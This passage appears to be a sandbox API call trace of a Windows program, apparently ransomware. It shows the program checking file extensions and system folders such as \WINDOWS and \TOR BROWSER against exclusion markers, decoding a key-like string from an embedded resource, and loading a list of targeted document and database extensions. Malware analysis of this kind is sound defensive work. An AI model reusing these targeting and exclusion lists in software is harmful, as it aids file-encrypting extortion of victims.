lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", 
cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] 
CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, 
lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] 
CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0098.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0098.089] GetCurrentThreadId () returned 0xbc0 [0098.089] GetCurrentThreadId () returned 0xbc0 [0098.089] GetCurrentThreadId () returned 0xbc0 [0098.089] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0098.089] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0098.089] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0098.089] LockResource (hResData=0x516f58) returned 0x516f58 [0098.089] FreeResource (hResData=0x516f58) 
returned 0 [0098.089] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0098.089] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0098.089] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0098.089] LockResource (hResData=0x50d64c) returned 0x50d64c [0098.089] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x15250b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0098.089] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x15250b0, cbMultiByte=38, lpWideCharStr=0x151de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0098.089] FreeResource (hResData=0x50d64c) returned 0 [0098.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0098.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x15250b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0098.089] GetCurrentThreadId () returned 0xbc0 [0098.089] GetCurrentThreadId () returned 0xbc0 [0098.089] GetCurrentThreadId () returned 0xbc0 [0098.089] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14b4258, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0098.089] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14b4258, cbMultiByte=97, lpWideCharStr=0x1482ebc, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 
